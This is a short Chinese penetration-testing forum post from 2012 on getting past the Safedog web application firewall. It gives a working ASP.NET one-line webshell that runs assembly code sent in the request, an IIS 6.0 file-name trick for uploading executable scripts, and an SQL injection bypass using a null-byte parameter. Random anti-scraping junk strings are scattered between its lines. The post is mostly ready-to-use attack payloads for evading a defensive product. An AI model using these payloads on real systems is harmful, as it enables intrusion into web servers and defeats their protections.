中国网络渗透测试联盟
标题:
突破安全狗防注入及上传的一些思路
[打印本页]
作者:
admin
时间:
2012-10-31 08:25
标题:
突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
E; V# X0 }) u+ E
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
: T5 Y; d5 @5 y" q, h" v2 g
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
& T+ r, i% ^4 V: G9 k- v: e$ n8 s/ {
, f6 [9 t- g$ M: @* p3 D% n
2、IIS6.0解析漏洞遇到安全狗。
2 x+ X; N* k$ a$ C9 v/ o
文件名为
1 h l8 s9 p5 ]2 F- s
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
4 @5 P: k: {8 g
1 ?- X4 D; s" u% F; V
这样的会被IIS安全狗果断屏蔽。
5 U+ m. a! l8 |) O0 _8 e
改成如下名称,IIS6一样会解析:
! @# d2 h! u! p8 \3 \+ G1 ~* p
www.xxxxx.com/;1.asp;1.jpg
( ~. n( e5 Y2 ?
8 J/ p0 C/ V& t2 G
3、安全狗的注入绕过。
1 D+ Q3 R# V! s/ ~5 ~8 n
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
0 Z* Y0 t& m" ^
但如果:
5 k+ }2 I7 T- i z: A& U4 W
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
: ~& \6 G |- ?! j- ~( M O
就可以成功绕过了。
4 [1 E$ w6 U9 h- D1 B# N/ ]4 t
! s3 N$ p7 g( F7 I$ _+ m
& o$ e9 @+ X5 k: s
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2